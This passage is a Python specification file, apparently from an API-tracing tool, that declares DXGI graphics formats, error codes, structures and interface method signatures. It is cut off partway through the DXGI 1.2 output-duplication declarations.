# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
##########################################################################/
from .winapi import *
DXGI_FORMAT = Enum("DXGI_FORMAT", [
"DXGI_FORMAT_UNKNOWN",
"DXGI_FORMAT_R32G32B32A32_TYPELESS",
"DXGI_FORMAT_R32G32B32A32_FLOAT",
"DXGI_FORMAT_R32G32B32A32_UINT",
"DXGI_FORMAT_R32G32B32A32_SINT",
"DXGI_FORMAT_R32G32B32_TYPELESS",
"DXGI_FORMAT_R32G32B32_FLOAT",
"DXGI_FORMAT_R32G32B32_UINT",
"DXGI_FORMAT_R32G32B32_SINT",
"DXGI_FORMAT_R16G16B16A16_TYPELESS",
"DXGI_FORMAT_R16G16B16A16_FLOAT",
"DXGI_FORMAT_R16G16B16A16_UNORM",
"DXGI_FORMAT_R16G16B16A16_UINT",
"DXGI_FORMAT_R16G16B16A16_SNORM",
"DXGI_FORMAT_R16G16B16A16_SINT",
"DXGI_FORMAT_R32G32_TYPELESS",
"DXGI_FORMAT_R32G32_FLOAT",
"DXGI_FORMAT_R32G32_UINT",
"DXGI_FORMAT_R32G32_SINT",
"DXGI_FORMAT_R32G8X24_TYPELESS",
"DXGI_FORMAT_D32_FLOAT_S8X24_UINT",
"DXGI_FORMAT_R32_FLOAT_X8X24_TYPELESS",
"DXGI_FORMAT_X32_TYPELESS_G8X24_UINT",
"DXGI_FORMAT_R10G10B10A2_TYPELESS",
"DXGI_FORMAT_R10G10B10A2_UNORM",
"DXGI_FORMAT_R10G10B10A2_UINT",
"DXGI_FORMAT_R11G11B10_FLOAT",
"DXGI_FORMAT_R8G8B8A8_TYPELESS",
"DXGI_FORMAT_R8G8B8A8_UNORM",
"DXGI_FORMAT_R8G8B8A8_UNORM_SRGB",
"DXGI_FORMAT_R8G8B8A8_UINT",
"DXGI_FORMAT_R8G8B8A8_SNORM",
"DXGI_FORMAT_R8G8B8A8_SINT",
"DXGI_FORMAT_R16G16_TYPELESS",
"DXGI_FORMAT_R16G16_FLOAT",
"DXGI_FORMAT_R16G16_UNORM",
"DXGI_FORMAT_R16G16_UINT",
"DXGI_FORMAT_R16G16_SNORM",
"DXGI_FORMAT_R16G16_SINT",
"DXGI_FORMAT_R32_TYPELESS",
"DXGI_FORMAT_D32_FLOAT",
"DXGI_FORMAT_R32_FLOAT",
"DXGI_FORMAT_R32_UINT",
"DXGI_FORMAT_R32_SINT",
"DXGI_FORMAT_R24G8_TYPELESS",
"DXGI_FORMAT_D24_UNORM_S8_UINT",
"DXGI_FORMAT_R24_UNORM_X8_TYPELESS",
"DXGI_FORMAT_X24_TYPELESS_G8_UINT",
"DXGI_FORMAT_R8G8_TYPELESS",
"DXGI_FORMAT_R8G8_UNORM",
"DXGI_FORMAT_R8G8_UINT",
"DXGI_FORMAT_R8G8_SNORM",
"DXGI_FORMAT_R8G8_SINT",
"DXGI_FORMAT_R16_TYPELESS",
"DXGI_FORMAT_R16_FLOAT",
"DXGI_FORMAT_D16_UNORM",
"DXGI_FORMAT_R16_UNORM",
"DXGI_FORMAT_R16_UINT",
"DXGI_FORMAT_R16_SNORM",
"DXGI_FORMAT_R16_SINT",
"DXGI_FORMAT_R8_TYPELESS",
"DXGI_FORMAT_R8_UNORM",
"DXGI_FORMAT_R8_UINT",
"DXGI_FORMAT_R8_SNORM",
"DXGI_FORMAT_R8_SINT",
"DXGI_FORMAT_A8_UNORM",
"DXGI_FORMAT_R1_UNORM",
"DXGI_FORMAT_R9G9B9E5_SHAREDEXP",
"DXGI_FORMAT_R8G8_B8G8_UNORM",
"DXGI_FORMAT_G8R8_G8B8_UNORM",
"DXGI_FORMAT_BC1_TYPELESS",
"DXGI_FORMAT_BC1_UNORM",
"DXGI_FORMAT_BC1_UNORM_SRGB",
"DXGI_FORMAT_BC2_TYPELESS",
"DXGI_FORMAT_BC2_UNORM",
"DXGI_FORMAT_BC2_UNORM_SRGB",
"DXGI_FORMAT_BC3_TYPELESS",
"DXGI_FORMAT_BC3_UNORM",
"DXGI_FORMAT_BC3_UNORM_SRGB",
"DXGI_FORMAT_BC4_TYPELESS",
"DXGI_FORMAT_BC4_UNORM",
"DXGI_FORMAT_BC4_SNORM",
"DXGI_FORMAT_BC5_TYPELESS",
"DXGI_FORMAT_BC5_UNORM",
"DXGI_FORMAT_BC5_SNORM",
"DXGI_FORMAT_B5G6R5_UNORM",
"DXGI_FORMAT_B5G5R5A1_UNORM",
"DXGI_FORMAT_B8G8R8A8_UNORM",
"DXGI_FORMAT_B8G8R8X8_UNORM",
"DXGI_FORMAT_R10G10B10_XR_BIAS_A2_UNORM",
"DXGI_FORMAT_B8G8R8A8_TYPELESS",
"DXGI_FORMAT_B8G8R8A8_UNORM_SRGB",
"DXGI_FORMAT_B8G8R8X8_TYPELESS",
"DXGI_FORMAT_B8G8R8X8_UNORM_SRGB",
"DXGI_FORMAT_BC6H_TYPELESS",
"DXGI_FORMAT_BC6H_UF16",
"DXGI_FORMAT_BC6H_SF16",
"DXGI_FORMAT_BC7_TYPELESS",
"DXGI_FORMAT_BC7_UNORM",
"DXGI_FORMAT_BC7_UNORM_SRGB",
"DXGI_FORMAT_AYUV",
"DXGI_FORMAT_Y410",
"DXGI_FORMAT_Y416",
"DXGI_FORMAT_NV12",
"DXGI_FORMAT_P010",
"DXGI_FORMAT_P016",
"DXGI_FORMAT_420_OPAQUE",
"DXGI_FORMAT_YUY2",
"DXGI_FORMAT_Y210",
"DXGI_FORMAT_Y216",
"DXGI_FORMAT_NV11",
"DXGI_FORMAT_AI44",
"DXGI_FORMAT_IA44",
"DXGI_FORMAT_P8",
"DXGI_FORMAT_A8P8",
"DXGI_FORMAT_B4G4R4A4_UNORM",
])
HRESULT = MAKE_HRESULT([
"DXGI_STATUS_OCCLUDED",
"DXGI_STATUS_CLIPPED",
"DXGI_STATUS_NO_REDIRECTION",
"DXGI_STATUS_NO_DESKTOP_ACCESS",
"DXGI_STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE",
"DXGI_STATUS_MODE_CHANGED",
"DXGI_STATUS_MODE_CHANGE_IN_PROGRESS",
"DXGI_ERROR_INVALID_CALL",
"DXGI_ERROR_NOT_FOUND",
"DXGI_ERROR_MORE_DATA",
"DXGI_ERROR_UNSUPPORTED",
"DXGI_ERROR_DEVICE_REMOVED",
"DXGI_ERROR_DEVICE_HUNG",
"DXGI_ERROR_DEVICE_RESET",
"DXGI_ERROR_WAS_STILL_DRAWING",
"DXGI_ERROR_FRAME_STATISTICS_DISJOINT",
"DXGI_ERROR_GRAPHICS_VIDPN_SOURCE_IN_USE",
"DXGI_ERROR_DRIVER_INTERNAL_ERROR",
"DXGI_ERROR_NONEXCLUSIVE",
"DXGI_ERROR_NOT_CURRENTLY_AVAILABLE",
"DXGI_ERROR_REMOTE_CLIENT_DISCONNECTED",
"DXGI_ERROR_REMOTE_OUTOFMEMORY",
# IDXGIKeyedMutex::AcquireSync
"WAIT_ABANDONED",
"WAIT_TIMEOUT",
])
DXGI_RGB = Struct("DXGI_RGB", [
(Float, "Red"),
(Float, "Green"),
(Float, "Blue"),
])
DXGI_GAMMA_CONTROL = Struct("DXGI_GAMMA_CONTROL", [
(DXGI_RGB, "Scale"),
(DXGI_RGB, "Offset"),
(Array(DXGI_RGB, 1025), "GammaCurve"),
])
DXGI_GAMMA_CONTROL_CAPABILITIES = Struct("DXGI_GAMMA_CONTROL_CAPABILITIES", [
(BOOL, "ScaleAndOffsetSupported"),
(Float, "MaxConvertedValue"),
(Float, "MinConvertedValue"),
(UINT, "NumGammaControlPoints"),
(Array(Float, "{self}.NumGammaControlPoints"), "ControlPointPositions"),
])
DXGI_RATIONAL = Struct("DXGI_RATIONAL", [
(UINT, "Numerator"),
(UINT, "Denominator"),
])
DXGI_MODE_SCANLINE_ORDER = Enum("DXGI_MODE_SCANLINE_ORDER", [
"DXGI_MODE_SCANLINE_ORDER_UNSPECIFIED",
"DXGI_MODE_SCANLINE_ORDER_PROGRESSIVE",
"DXGI_MODE_SCANLINE_ORDER_UPPER_FIELD_FIRST",
"DXGI_MODE_SCANLINE_ORDER_LOWER_FIELD_FIRST",
])
DXGI_MODE_SCALING = Enum("DXGI_MODE_SCALING", [
"DXGI_MODE_SCALING_UNSPECIFIED",
"DXGI_MODE_SCALING_CENTERED",
"DXGI_MODE_SCALING_STRETCHED",
])
DXGI_MODE_ROTATION = Enum("DXGI_MODE_ROTATION", [
"DXGI_MODE_ROTATION_UNSPECIFIED",
"DXGI_MODE_ROTATION_IDENTITY",
"DXGI_MODE_ROTATION_ROTATE90",
"DXGI_MODE_ROTATION_ROTATE180",
"DXGI_MODE_ROTATION_ROTATE270",
])
DXGI_MODE_DESC = Struct("DXGI_MODE_DESC", [
(UINT, "Width"),
(UINT, "Height"),
(DXGI_RATIONAL, "RefreshRate"),
(DXGI_FORMAT, "Format"),
(DXGI_MODE_SCANLINE_ORDER, "ScanlineOrdering"),
(DXGI_MODE_SCALING, "Scaling"),
])
DXGI_QUALITY_LEVEL = FakeEnum(UINT, [
"DXGI_STANDARD_MULTISAMPLE_QUALITY_PATTERN",
"DXGI_CENTER_MULTISAMPLE_QUALITY_PATTERN",
])
DXGI_SAMPLE_DESC = Struct("DXGI_SAMPLE_DESC", [
(UINT, "Count"),
(DXGI_QUALITY_LEVEL, "Quality"),
])
DXGI_RGBA = Struct("DXGI_RGBA", [
(Float, "r"),
(Float, "g"),
(Float, "b"),
(Float, "a"),
])
IDXGIObject = Interface("IDXGIObject", IUnknown)
IDXGIDeviceSubObject = Interface("IDXGIDeviceSubObject", IDXGIObject)
IDXGIResource = Interface("IDXGIResource", IDXGIDeviceSubObject)
IDXGIKeyedMutex = Interface("IDXGIKeyedMutex", IDXGIDeviceSubObject)
IDXGISurface = Interface("IDXGISurface", IDXGIDeviceSubObject)
IDXGISurface1 = Interface("IDXGISurface1", IDXGISurface)
IDXGIAdapter = Interface("IDXGIAdapter", IDXGIObject)
IDXGIOutput = Interface("IDXGIOutput", IDXGIObject)
IDXGISwapChain = Interface("IDXGISwapChain", IDXGIDeviceSubObject)
IDXGIFactory = Interface("IDXGIFactory", IDXGIObject)
IDXGIDevice = Interface("IDXGIDevice", IDXGIObject)
IDXGIFactory1 = Interface("IDXGIFactory1", IDXGIFactory)
IDXGIAdapter1 = Interface("IDXGIAdapter1", IDXGIAdapter)
IDXGIDevice1 = Interface("IDXGIDevice1", IDXGIDevice)
DXGI_USAGE = Flags(UINT, [
"DXGI_CPU_ACCESS_NONE", # 0
"DXGI_CPU_ACCESS_SCRATCH", # 3
"DXGI_CPU_ACCESS_DYNAMIC", # 1
"DXGI_CPU_ACCESS_READ_WRITE", # 2
"DXGI_USAGE_SHADER_INPUT",
"DXGI_USAGE_RENDER_TARGET_OUTPUT",
"DXGI_USAGE_BACK_BUFFER",
"DXGI_USAGE_SHARED",
"DXGI_USAGE_READ_ONLY",
"DXGI_USAGE_DISCARD_ON_PRESENT",
"DXGI_USAGE_UNORDERED_ACCESS",
])
DXGI_FRAME_STATISTICS = Struct("DXGI_FRAME_STATISTICS", [
(UINT, "PresentCount"),
(UINT, "PresentRefreshCount"),
(UINT, "SyncRefreshCount"),
(LARGE_INTEGER, "SyncQPCTime"),
(LARGE_INTEGER, "SyncGPUTime"),
])
DXGI_MAPPED_RECT = Struct("DXGI_MAPPED_RECT", [
(INT, "Pitch"),
(LinearPointer(BYTE, "_MappedSize"), "pBits"),
])
DXGI_ADAPTER_DESC = Struct("DXGI_ADAPTER_DESC", [
(WString, "Description"),
(UINT, "VendorId"),
(UINT, "DeviceId"),
(UINT, "SubSysId"),
(UINT, "Revision"),
(SIZE_T, "DedicatedVideoMemory"),
(SIZE_T, "DedicatedSystemMemory"),
(SIZE_T, "SharedSystemMemory"),
(LUID, "AdapterLuid"),
])
DXGI_OUTPUT_DESC = Struct("DXGI_OUTPUT_DESC", [
(WString, "DeviceName"),
(RECT, "DesktopCoordinates"),
(BOOL, "AttachedToDesktop"),
(DXGI_MODE_ROTATION, "Rotation"),
(HMONITOR, "Monitor"),
])
DXGI_SHARED_RESOURCE = Struct("DXGI_SHARED_RESOURCE", [
(HANDLE, "Handle"),
])
DXGI_RESOURCE_PRIORITY = FakeEnum(UINT, [
"DXGI_RESOURCE_PRIORITY_MINIMUM",
"DXGI_RESOURCE_PRIORITY_LOW",
"DXGI_RESOURCE_PRIORITY_NORMAL",
"DXGI_RESOURCE_PRIORITY_HIGH",
"DXGI_RESOURCE_PRIORITY_MAXIMUM",
])
DXGI_RESIDENCY = Enum("DXGI_RESIDENCY", [
"DXGI_RESIDENCY_FULLY_RESIDENT",
"DXGI_RESIDENCY_RESIDENT_IN_SHARED_MEMORY",
"DXGI_RESIDENCY_EVICTED_TO_DISK",
])
DXGI_SURFACE_DESC = Struct("DXGI_SURFACE_DESC", [
(UINT, "Width"),
(UINT, "Height"),
(DXGI_FORMAT, "Format"),
(DXGI_SAMPLE_DESC, "SampleDesc"),
])
DXGI_SWAP_EFFECT = Enum("DXGI_SWAP_EFFECT", [
"DXGI_SWAP_EFFECT_DISCARD",
"DXGI_SWAP_EFFECT_SEQUENTIAL",
"DXGI_SWAP_EFFECT_FLIP_SEQUENTIAL",
"DXGI_SWAP_EFFECT_FLIP_DISCARD",
])
DXGI_SWAP_CHAIN_FLAG = Flags(UINT, [
"DXGI_SWAP_CHAIN_FLAG_NONPREROTATED",
"DXGI_SWAP_CHAIN_FLAG_ALLOW_MODE_SWITCH",
"DXGI_SWAP_CHAIN_FLAG_GDI_COMPATIBLE",
"DXGI_SWAP_CHAIN_FLAG_RESTRICTED_CONTENT",
"DXGI_SWAP_CHAIN_FLAG_RESTRICT_SHARED_RESOURCE_DRIVER",
"DXGI_SWAP_CHAIN_FLAG_DISPLAY_ONLY",
"DXGI_SWAP_CHAIN_FLAG_FRAME_LATENCY_WAITABLE_OBJECT",
"DXGI_SWAP_CHAIN_FLAG_FOREGROUND_LAYER",
"DXGI_SWAP_CHAIN_FLAG_FULLSCREEN_VIDEO",
"DXGI_SWAP_CHAIN_FLAG_YUV_VIDEO",
"DXGI_SWAP_CHAIN_FLAG_HW_PROTECTED",
"DXGI_SWAP_CHAIN_FLAG_ALLOW_TEARING",
#"DXGI_SWAP_CHAIN_FLAG_RESTRICTED_TO_ALL_HOLOGRAPHIC_DISPLAYS", # DXGI 1.6
])
DXGI_SWAP_CHAIN_DESC = Struct("DXGI_SWAP_CHAIN_DESC", [
(DXGI_MODE_DESC, "BufferDesc"),
(DXGI_SAMPLE_DESC, "SampleDesc"),
(DXGI_USAGE, "BufferUsage"),
(UINT, "BufferCount"),
(HWND, "OutputWindow"),
(BOOL, "Windowed"),
(DXGI_SWAP_EFFECT, "SwapEffect"),
(DXGI_SWAP_CHAIN_FLAG, "Flags"),
])
IDXGIObject.methods += [
StdMethod(HRESULT, "SetPrivateData", [(REFGUID, "Name"), (UINT, "DataSize"), (OpaqueBlob(Const(Void), "DataSize"), "pData")], sideeffects=False),
StdMethod(HRESULT, "SetPrivateDataInterface", [(REFGUID, "Name"), (OpaquePointer(Const(IUnknown)), "pUnknown")], sideeffects=False),
StdMethod(HRESULT, "GetPrivateData", [(REFGUID, "Name"), InOut(Pointer(UINT), "pDataSize"), Out(OpaquePointer(Void), "pData")], sideeffects=False),
StdMethod(HRESULT, "GetParent", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppParent")]),
]
IDXGIDeviceSubObject.methods += [
StdMethod(HRESULT, "GetDevice", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppDevice")]),
]
SHARED_HANDLE = Handle("shared_handle", RAW_HANDLE)
IDXGIResource.methods += [
StdMethod(HRESULT, "GetSharedHandle", [Out(Pointer(SHARED_HANDLE), "pSharedHandle")]),
StdMethod(HRESULT, "GetUsage", [Out(Pointer(DXGI_USAGE), "pUsage")], sideeffects=False),
StdMethod(HRESULT, "SetEvictionPriority", [(DXGI_RESOURCE_PRIORITY, "EvictionPriority")]),
StdMethod(HRESULT, "GetEvictionPriority", [Out(Pointer(DXGI_RESOURCE_PRIORITY), "pEvictionPriority")], sideeffects=False),
]
DWORD_TIMEOUT = FakeEnum(DWORD, [
"INFINITE",
])
IDXGIKeyedMutex.methods += [
StdMethod(HRESULT, "AcquireSync", [(UINT64, "Key"), (DWORD_TIMEOUT, "dwMilliseconds")], sideeffects=False),
StdMethod(HRESULT, "ReleaseSync", [(UINT64, "Key")]),
]
DXGI_MAP = Flags(UINT, [
"DXGI_MAP_READ",
"DXGI_MAP_WRITE",
"DXGI_MAP_DISCARD",
])
IDXGISurface.methods += [
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_SURFACE_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "Map", [Out(Pointer(DXGI_MAPPED_RECT), "pLockedRect"), (DXGI_MAP, "MapFlags")]),
StdMethod(HRESULT, "Unmap", []),
]
IDXGISurface1.methods += [
StdMethod(HRESULT, "GetDC", [(BOOL, "Discard"), Out(Pointer(HDC), "phdc")]),
StdMethod(HRESULT, "ReleaseDC", [(Pointer(RECT), "pDirtyRect")]),
]
IDXGIAdapter.methods += [
StdMethod(HRESULT, "EnumOutputs", [(UINT, "Output"), Out(Pointer(ObjPointer(IDXGIOutput)), "ppOutput")]),
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_ADAPTER_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "CheckInterfaceSupport", [(REFGUID, "InterfaceName"), Out(Pointer(LARGE_INTEGER), "pUMDVersion")], sideeffects=False),
]
DXGI_ENUM_MODES = Flags(UINT, [
"DXGI_ENUM_MODES_INTERLACED",
"DXGI_ENUM_MODES_SCALING",
"DXGI_ENUM_MODES_STEREO",
"DXGI_ENUM_MODES_DISABLED_STEREO",
])
IDXGIOutput.methods += [
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_OUTPUT_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "GetDisplayModeList", [(DXGI_FORMAT, "EnumFormat"), (DXGI_ENUM_MODES, "Flags"), InOut(Pointer(UINT), "pNumModes"), Out(Array(DXGI_MODE_DESC, "*pNumModes"), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "FindClosestMatchingMode", [(Pointer(Const(DXGI_MODE_DESC)), "pModeToMatch"), Out(Pointer(DXGI_MODE_DESC), "pClosestMatch"), (ObjPointer(IUnknown), "pConcernedDevice")], sideeffects=False),
StdMethod(HRESULT, "WaitForVBlank", []),
StdMethod(HRESULT, "TakeOwnership", [(ObjPointer(IUnknown), "pDevice"), (BOOL, "Exclusive")]),
StdMethod(Void, "ReleaseOwnership", []),
StdMethod(HRESULT, "GetGammaControlCapabilities", [Out(Pointer(DXGI_GAMMA_CONTROL_CAPABILITIES), "pGammaCaps")], sideeffects=False),
StdMethod(HRESULT, "SetGammaControl", [(Pointer(Const(DXGI_GAMMA_CONTROL)), "pArray")], sideeffects=False), # Avoid NumGammaControlPoints mismatch
StdMethod(HRESULT, "GetGammaControl", [Out(Pointer(DXGI_GAMMA_CONTROL), "pArray")], sideeffects=False),
StdMethod(HRESULT, "SetDisplaySurface", [(ObjPointer(IDXGISurface), "pScanoutSurface")]),
StdMethod(HRESULT, "GetDisplaySurfaceData", [(ObjPointer(IDXGISurface), "pDestination")]),
StdMethod(HRESULT, "GetFrameStatistics", [Out(Pointer(DXGI_FRAME_STATISTICS), "pStats")], sideeffects=False),
]
DXGI_PRESENT = Flags(UINT, [
"DXGI_PRESENT_TEST",
"DXGI_PRESENT_DO_NOT_SEQUENCE",
"DXGI_PRESENT_RESTART",
"DXGI_PRESENT_DO_NOT_WAIT",
"DXGI_PRESENT_STEREO_PREFER_RIGHT",
"DXGI_PRESENT_STEREO_TEMPORARY_MONO",
"DXGI_PRESENT_RESTRICT_TO_OUTPUT",
"DXGI_PRESENT_USE_DURATION",
])
IDXGISwapChain.methods += [
StdMethod(HRESULT, "Present", [(UINT, "SyncInterval"), (DXGI_PRESENT, "Flags")]),
StdMethod(HRESULT, "GetBuffer", [(UINT, "Buffer"), (REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppSurface")]),
StdMethod(HRESULT, "SetFullscreenState", [(BOOL, "Fullscreen"), (ObjPointer(IDXGIOutput), "pTarget")]),
StdMethod(HRESULT, "GetFullscreenState", [Out(Pointer(BOOL), "pFullscreen"), Out(Pointer(ObjPointer(IDXGIOutput)), "ppTarget")]),
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_SWAP_CHAIN_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "ResizeBuffers", [(UINT, "BufferCount"), (UINT, "Width"), (UINT, "Height"), (DXGI_FORMAT, "NewFormat"), (DXGI_SWAP_CHAIN_FLAG, "SwapChainFlags")]),
StdMethod(HRESULT, "ResizeTarget", [(Pointer(Const(DXGI_MODE_DESC)), "pNewTargetParameters")]),
StdMethod(HRESULT, "GetContainingOutput", [Out(Pointer(ObjPointer(IDXGIOutput)), "ppOutput")]),
StdMethod(HRESULT, "GetFrameStatistics", [Out(Pointer(DXGI_FRAME_STATISTICS), "pStats")], sideeffects=False),
StdMethod(HRESULT, "GetLastPresentCount", [Out(Pointer(UINT), "pLastPresentCount")], sideeffects=False),
]
DXGI_MWA = Flags(UINT, [
"DXGI_MWA_NO_WINDOW_CHANGES",
"DXGI_MWA_NO_ALT_ENTER",
"DXGI_MWA_NO_PRINT_SCREEN",
"DXGI_MWA_VALID",
])
IDXGIFactory.methods += [
StdMethod(HRESULT, "EnumAdapters", [(UINT, "Adapter"), Out(Pointer(ObjPointer(IDXGIAdapter)), "ppAdapter")]),
StdMethod(HRESULT, "MakeWindowAssociation", [(HWND, "WindowHandle"), (DXGI_MWA, "Flags")], sideeffects=False),
StdMethod(HRESULT, "GetWindowAssociation", [Out(Pointer(HWND), "pWindowHandle")], sideeffects=False),
StdMethod(HRESULT, "CreateSwapChain", [(ObjPointer(IUnknown), "pDevice"), (Pointer(DXGI_SWAP_CHAIN_DESC), "pDesc"), Out(Pointer(ObjPointer(IDXGISwapChain)), "ppSwapChain")]),
StdMethod(HRESULT, "CreateSoftwareAdapter", [(HMODULE, "Module"), Out(Pointer(ObjPointer(IDXGIAdapter)), "ppAdapter")]),
]
IDXGIDevice.methods += [
StdMethod(HRESULT, "GetAdapter", [Out(Pointer(ObjPointer(IDXGIAdapter)), "pAdapter")]),
StdMethod(HRESULT, "CreateSurface", [(Pointer(Const(DXGI_SURFACE_DESC)), "pDesc"), (UINT, "NumSurfaces"), (DXGI_USAGE, "Usage"), (Pointer(Const(DXGI_SHARED_RESOURCE)), "pSharedResource"), Out(Pointer(ObjPointer(IDXGISurface)), "ppSurface")]),
StdMethod(HRESULT, "QueryResourceResidency", [(Array(Const(ObjPointer(IUnknown)), "NumResources"), "ppResources"), Out(Array(DXGI_RESIDENCY, "NumResources"), "pResidencyStatus"), (UINT, "NumResources")], sideeffects=False),
StdMethod(HRESULT, "SetGPUThreadPriority", [(INT, "Priority")]),
StdMethod(HRESULT, "GetGPUThreadPriority", [Out(Pointer(INT), "pPriority")], sideeffects=False),
]
DXGI_ADAPTER_FLAG = FakeEnum(UINT, [
"DXGI_ADAPTER_FLAG_NONE",
"DXGI_ADAPTER_FLAG_REMOTE",
"DXGI_ADAPTER_FLAG_SOFTWARE",
])
DXGI_ADAPTER_DESC1 = Struct("DXGI_ADAPTER_DESC1", [
(WString, "Description"),
(UINT, "VendorId"),
(UINT, "DeviceId"),
(UINT, "SubSysId"),
(UINT, "Revision"),
(SIZE_T, "DedicatedVideoMemory"),
(SIZE_T, "DedicatedSystemMemory"),
(SIZE_T, "SharedSystemMemory"),
(LUID, "AdapterLuid"),
(DXGI_SWAP_CHAIN_FLAG, "Flags"),
])
DXGI_DISPLAY_COLOR_SPACE = Struct("DXGI_DISPLAY_COLOR_SPACE", [
(Array(Array(FLOAT, 8), 2), "PrimaryCoordinates"),
(Array(Array(FLOAT, 16), 2), "WhitePoints"),
])
IDXGIFactory1.methods += [
StdMethod(HRESULT, "EnumAdapters1", [(UINT, "Adapter"), Out(Pointer(ObjPointer(IDXGIAdapter1)), "ppAdapter")]),
StdMethod(BOOL, "IsCurrent", [], sideeffects=False),
]
IDXGIAdapter1.methods += [
StdMethod(HRESULT, "GetDesc1", [Out(Pointer(DXGI_ADAPTER_DESC1), "pDesc")], sideeffects=False),
]
IDXGIDevice1.methods += [
StdMethod(HRESULT, "SetMaximumFrameLatency", [(UINT, "MaxLatency")]),
StdMethod(HRESULT, "GetMaximumFrameLatency", [Out(Pointer(UINT), "pMaxLatency")], sideeffects=False),
]
dxgi = Module('dxgi')
dxgi.addInterfaces([
IDXGIKeyedMutex,
IDXGIFactory1,
IDXGIDevice1,
IDXGIAdapter1,
IDXGIResource,
])
dxgi.addFunctions([
StdFunction(HRESULT, "CreateDXGIFactory", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppFactory")]),
StdFunction(HRESULT, "CreateDXGIFactory1", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppFactory")]),
StdFunction(HRESULT, "DXGID3D10CreateDevice", [(HMODULE, "hModule"), (ObjPointer(IDXGIFactory), "pFactory"), (ObjPointer(IDXGIAdapter), "pAdapter"), (UINT, "Flags"), (OpaquePointer(Const(IUnknown)), "pUnknown"), Out(Pointer(ObjPointer(Void)), "ppDevice")], internal=True),
StdFunction(HRESULT, "DXGID3D10CreateLayeredDevice", [(UINT), (UINT), (UINT), (UINT), (UINT)], internal=True),
StdFunction(SIZE_T, "DXGID3D10GetLayeredDeviceSize", [(OpaqueArray(Const(Void), "NumLayers"), "pLayers"), (UINT, "NumLayers")], internal=True),
StdFunction(HRESULT, "DXGID3D10RegisterLayers", [(OpaqueArray(Const(Void), "NumLayers"), "pLayers"), (UINT, "NumLayers")], internal=True),
])
#
# DXGI 1.2
#
IDXGIDisplayControl = Interface("IDXGIDisplayControl", IUnknown)
IDXGIDisplayControl.methods += [
StdMethod(BOOL, "IsStereoEnabled", [], sideeffects=False),
StdMethod(Void, "SetStereoEnabled", [(BOOL, "enabled")]),
]
DXGI_OUTDUPL_MOVE_RECT = Struct("DXGI_OUTDUPL_MOVE_RECT", [
(POINT, "SourcePoint"),
(RECT, "DestinationRect"),
])
DXGI_OUTDUPL_DESC = Struct("DXGI_OUTDUPL_DESC", [
(DXGI_MODE_DESC, "ModeDesc"),
(DXGI_MODE_ROTATION, "Rotation"),
(BOOL, "DesktopImageInSystemMemory"),
])
DXGI_OUTDUPL_POINTER_POSITION = Struct("DXGI_OUTDUPL_POINTER_POSITION", [
(POINT, "Position"),
(BOOL, "Visible"),
])
DXGI_OUTDUPL_POINTER_SHAPE_TYPE = Enum("DXGI_OUTDUPL_POINTER_SHAPE_TYPE", [
"DXGI_OUTDUPL_POINTER_SHAPE_TYPE_MONOCHROME",
"DXGI_OUTDUPL_POINTER_SHAPE_TYPE_COLOR",
"DXGI_OUTDUPL_POINTER_SHAPE_TYPE_MASKED_COLOR",
])
DXGI_OUTDUPL_POINTER_SHAPE_INFO = Struct("DXGI_OUTDUPL_POINTER_SHAPE_INFO", [
(UINT, "Type"),
(UINT, "Width"),
(UINT, "Height"),
(UINT, "Pitch"),
(POINT, "HotSpot"),
])
DXGI_OUTDUPL_FRAME_INFO = Struct("DXGI_OUTDUPL_FRAME_INFO", [
(LARGE_INTEGER, "LastPresentTime"),
(LARGE_INTEGER, "LastMouseUpdateTime"),
(UINT, "AccumulatedFrames"),
(BOOL, "RectsCoalesced"),
(BOOL, "ProtectedContentMaskedOut"),
(DXGI_OUTDUPL_POINTER_POSITION, "PointerPosition"),
(UINT, "TotalMetadataBufferSize"),
(UINT, "PointerShapeBufferSize"),
])
IDXGIOutputDuplication = Interface("IDXGIOutputDuplication", IDXGIObject)
IDXGIOutputDuplication.methods += [
StdMethod(Void, "GetDesc", [Out(Pointer(DXGI_OUTDUPL_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "AcquireNextFrame", [(UINT, "TimeoutInMilliseconds"), Out(Pointer(DXGI_OUTDUPL_FRAME_INFO), "pFrameInfo"), Out(Pointer(ObjPointer(IDXGIResource)), "ppDesktopResource")]),
StdMethod(HRESULT, "GetFrameDirtyRects", [(UINT, "DirtyRectsBufferSize"), Out(Array(RECT, "DirtyRectsBufferSize"), "pDirtyRectsBuffer"), Out(Pointer(UINT), "pDirtyRectsBufferSizeRequired")], sideeffects=False),
StdMethod(HRESULT, "GetFrameMoveRects", [(UINT, "MoveRectsBufferSize"), Out(Array(DXGI_OUTDUPL_MOVE_RECT, "MoveRectsBufferSize"), "pMoveRectBuffer"), Out(Pointer(UINT), "pMoveRectsBufferSizeRequired")], sideeffects=False),
StdMethod(HRESULT, "GetFramePointerShape", [(UINT, "PointerShapeBufferSize"), Out(OpaqueBlob(Void, "PointerShapeBufferSize"), "pPointerShapeBuffer"), Out(Pointer(UINT), "pPointerShapeBufferSizeRequired"), Out(Pointer(DXGI_OUTDUPL_POINTER_SHAPE_INFO), "pPointerShapeInfo")], sideeffects=False),
